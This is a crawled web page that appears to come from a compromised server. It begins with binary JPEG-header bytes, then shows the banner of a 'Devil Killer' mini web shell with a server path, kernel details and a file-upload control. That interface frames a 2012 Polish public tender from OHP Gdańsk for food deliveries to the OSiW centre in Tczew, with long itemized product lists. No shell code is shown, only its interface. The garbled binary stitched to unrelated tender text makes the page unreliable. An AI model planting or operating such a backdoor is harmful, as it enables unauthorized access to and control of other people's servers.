JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121115/452272-N-2012.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie w 2013 r.</b><br>
<b>Numer ogłoszenia: 452272 - 2012; data zamieszczenia: 15.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pomorska.ohp.pl/  http://www.pomorskie.eu/pl/bip/ohp</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie w 2013 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie od 1 stycznia 2013 r. do dnia 31 grudnia 2013 roku do: Ośrodka Szkolenia i Wychowania w Tczewie, ul. Sobieskiego 10. 
2.	Przedmiot zamówienia podzielono na czternaście zadań częściowych:

Zadanie nr 1 - owoce świeże 
Zadanie nr 2 - owoce przetworzone  
Zadanie nr 3 - warzywa świeże 
Zadanie nr 4 - warzywa przetworzone 
Zadanie nr 5 - mrożonki 
Zadanie nr 6 - jaja
Zadanie nr 7 - mięso i produkty mięsne 
Zadanie nr 8 - ryby i przetwory konserwowe 
Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo 
Zadanie nr 10 - produkty skrobi - mąka  
Zadanie nr 11 - różne produkty spożywcze 
Zadanie nr 12- oleje i tłuszcze roślinne 
Zadanie nr 13 - produkty mleczarskie  
Zadanie nr 14 - napoje   
3.	Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do Ośrodka Szkolenia i Wychowania w Tczewie, ul. Sobieskiego 10 (dokładne miejsce na terenie OSiW Tczew wskazane będzie przez Zamawiającego po podpisaniu umowy).
4.	Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
5.	Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Cykliczne dostawy  będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00. najpóźniej na drugi dzień od złożenia zapotrzebowania. Każdorazowa dostawa odbywa się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę dostarczenia, ilość, rodzaj artykułów, złożonego nawet w dniu poprzedzającym dostawę (pisemnie, faksem lub telefonicznie). 
6.	Cykliczne dostawy  będą realizowane jak następuje:  
7.	Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości.
8.	Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
9.	Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument.
10.	 Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
11.	Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
12.	Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia      zamówienia. Wykonawcy będzie przysługiwało jedynie wynagrodzenie za zrealizowane dostawy bez naliczania kar umownych w razie zmniejszenia ilości dostaw.
13.	W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
14.	Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
15.	Do składania zamówień Zamawiający upoważni wybranego pracownika.
16.	Każda dostawa winna być ubezpieczona przez Wykonawcę na jego koszt w zakresie odpowiedzialności cywilnej.
17.	W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie.
18.	Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie rozwiązań równoważnych o parametrach techniczno eksploatacyjno użytkowych nie gorszych niż te, podane pod pojęciem typu. 
19.	Wykonawca ma obowiązek wystawiać faktury oddzielne na każde zadanie w ramach zamówienia cząstkowego.  
20.	Zamawiający zastrzega sobie możliwość  zastosowania prawa opcji, tj. możliwość zmniejszenia ilości poszczególnych rodzajów artykułów żywnościowych w stosunku do podanych w formularzu cenowym. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 70 % ogólnej wartości tzn. zostanie zrealizowany w co najmniej 30 % wartości zamówienia.
arbuz	kg	100.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8, 15.30.00.00-1, 15.50.00.00-3, 15.89.80.00-9, 15.43.00.00-1, 03.21.00.00-6, 15.41.00.00-5, 15.13.10.00-5, 15.33.11.70-9, 03.22.00.00-9, 15.33.24.10-1, 15.22.00.00-6, 15.86.00.00-0, 15.87.00.00-0, 15.13.11.10-9, 15.13.11.20-2, 15.13.11.30-5, 15.10.00.00-9, 15.20.00.00-0, 15.11.90.00-5, 15.90.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.1. siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.1. siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.1. siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.1. siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.1. siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.

1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia - art. 23 ust. 1 ustawy Pzp.                   W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy.
2.	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich                   w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i dlatego też zobowiązane są dołączyć do oferty - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia, albo pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.
3.	Wykonawcy, o których mowa w punkcie 1 składają jedną ofertę, przy czym:
A.	Załącznik nr 3 do SIWZ (Oświadczenie Wykonawcy o braku podstaw do wykluczenia) każdy z Wykonawców składa oddzielnie w formie oryginału i podpisuje we własnym imieniu. Dopuszcza się możliwość złożenia na jednym formularzu, w którym będą znajdować się podpisy umocowanych osób wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
B.	Załącznik nr 2 (Oświadczenie Wykonawcy o spełnianiu warunków udziału w  postępowaniu) Wykonawcy składają w formie oryginału i mogą złożyć wspólnie na jednym dokumencie (oświadczenie podpisane przez Pełnomocnika lub przez każdego z Wykonawców odrębnie), lub każdy z nich na osobnym dokumencie.
UWAGA: Do podmiotów wspólnie ubiegających się o zamówienie publiczne stosuje się te same przepisy co do pojedynczego wykonawcy. Odpowiednie ich stosowanie oznacza, że każdy uczestnik wspólnej oferty musi posiadać uprawnienia do wykonywania określonej działalności lub czynności i nie może podlegać wykluczeniu z postępowania. Natomiast przy ocenie spełniania warunków, brany jest pod uwagę łączny potencjał techniczny i kadrowy wykonawców (członków konsorcjum, członków spółki cywilnej) ich łączne kwalifikacje i doświadczenie oraz łączną sytuację ekonomiczną i finansową.
6.	W przypadku Wykonawców występujących wspólnie (konsorcjum), oprócz w/w dokumentów należy dołączyć:
A.	Pełnomocnictwo lidera - pełnomocnika do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o zamówienie, a w szczególności do złożenia oferty lub do złożenia oferty i podpisania umów w imieniu konsorcjum. Fakt ustanowienia pełnomocnika musi wynikać z załączonych do oferty dokumentów (np. pełnomocnictwa). Wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na Wykonawcę, w miejscu nazwa i adres Wykonawcy należy wpisać oprócz danych pełnomocnika konsorcjum, również dane dotyczące wszystkich członków konsorcjum - wszystkich Wykonawców składających ofertę wspólną. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem wymienionym w pełnomocnictwie występującym jako reprezentant pozostałych konsorcjantów.
B.	Oświadczenie wszystkich członków konsorcjum o ich odpowiedzialności solidarnej za zobowiązania.
7.	Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik także pełnomocnictwo określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>19.	Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie:
A.	Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
B.	Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
C.	W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. W przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT jeszcze nie dokonano.
D.	W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pomorskie.eu/pl/bip/ohp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można uzyskać nieodpłatnie  w godz. od 8oo-15 oo  w siedzibie  Zamawiającego,  pokój nr 605, VI piętro - sekretariat ogólny.
ul. Uphagena 27, 80-237 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2012 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 (sekretariat pokój 605) 6 piętro:.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> arbuz	kg	100
banany	kg	150
brzoskwinie	kg	80
cytryny	kg	30
gruszki	kg	60
jabłka	kg	300
kiwi	kg	11
kiwi	szt	92
maliny	kg	8
maliny 500g	szt	8
mandarynki	kg	80
nektaryny	kg	50
pomarancza	kg	60
śliwki	kg	20
truskawki	kg	30
winogrona	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowany565g	szt	48
brzoskwinie kons.820g	szt	30
Dżem  270g	szt	100
Dżem 7 kg	szt	10
kompot wiśniowy 0,9 l	szt	50
rodzynki suszone 100g	szt	20
sok owocowy 1l (różne smaki-pomarań, gruszka, wiśnia, grejfrut,mix itp.)	szt	45
sok owocowy 2l (różne smaki-pomarańczgrejfrut, jabłkowy, cz.pożeczka, mixitp)	szt	30
sok typu owocowy, warzywno -owocowe (marchew-trusk-banan, marchew-malina-banan, marchew-jabł-banan itp.) 220ml	szt	185
syrop owocowy 1l	szt	20
syrop owocowy 4,96l	szt	43.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuł	szt	35
burak	kg	250
burak młody - botwina	szt	50
cebula	kg	350
cebula czerwona 	kg	5
czosnek	szt	25
fasola drobna 	kg	25
fasola jaś	kg	25
fasola szparagowa	kg	15
groch łuska 0,5kg	szt	40
kalafior	szt	65
kapusta 	kg	200
kapusta czerwona	kg	20
kapusta młoda 	szt	50
kapusta pekińska	kg	80
kapusta pekińska	szt	40
koper	szt	100
koper duży	szt	15
marchew młoda	kg	50
marchew myta	kg	400
ogórek świeży	kg	250
papryka świeża	kg	80
pietruszka korzeń	kg	20
pomidor	kg	200
por 	szt	40
por 	kg	100
rzodkiewka pęczki	szt	120
sałata	szt	100
seler	kg	190
szczypiorek	szt	70
zielenina natka	szt	250
ziemniaki 	kg	3500
ziemniaki młode	kg	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chrzan tarty 160g	szt	15
fasolka czerwona konserw.400g	szt	10
groszek konserwowy 400g	szt	40
groszek z marchewką 0,9l	szt	20
kapusta kiszona  	kg	180
koncentrat pomidorowy 0,9l - 1l	szt	55
kukurydza konserwowa 400g	szt	40
ogórki kiszone 	kg	100
ogórki konserwowe 0,9l	szt	90
ogórki małosolne	kg	15
papryka konserwowa 0,9l	szt	85
pieczarka	kg	80
pieczarka konserwowa 0,9l	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuły mroż. 2,5 kg	szt	8
brukselka mroż 0.5 kg	szt	20
Frytki 2 kg	szt	20
hamburger mrozony 	szt	180
kalafior mroż	kg	25
marchew kostka mroż	kg	50
mieszanka kompotowa 	kg	15
pizza 500g	szt	90
pyzy z mięsem  	kg	70
pyzy z owocami (knedle)	kg	60
truskawki mrozone	kg	10
warzywa na pat.chinskie	kg	10
zapiekanka 200g	szt	135
zupa wiosenna	kg	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja	szt	3500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.42.50-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baleron wieprzowy	kg	50
boczek świeży	kg	40
boczek wędzony surowy	kg	90
filet drobiowy z indyka	kg	18
filet królewski z indyka lu równoważny	kg	50
filet z piersi kurczaka	kg	114
golonka wieprz b/k	kg	12
karkówka wieprz b/k 	kg	100
kaszanka	kg	70
kiełbasa biała  surowa	kg	20
kiełbasa biała parzona	kg	20
kiełbasa krakowska	kg	50
kiełbasa szynkowa drobiowa	kg	150
kiełbasa szynkowa wieprzowa	kg	150
kiełbasa śląska lub równowazna	kg	90
kiełbasa toruńska lub równowazna	kg	50
kiełbasa typu ogniskowa lub równoważna	kg	40
korpusy drobiowe(grzbiety)	kg	200
kości wieprzowe	kg	100
kotlet do hamburgera 250g	szt	96
łopatka b/k	kg	400
metka cebulowa 200g	szt	90
metka inna typu wiejska lub równowazna	kg	20
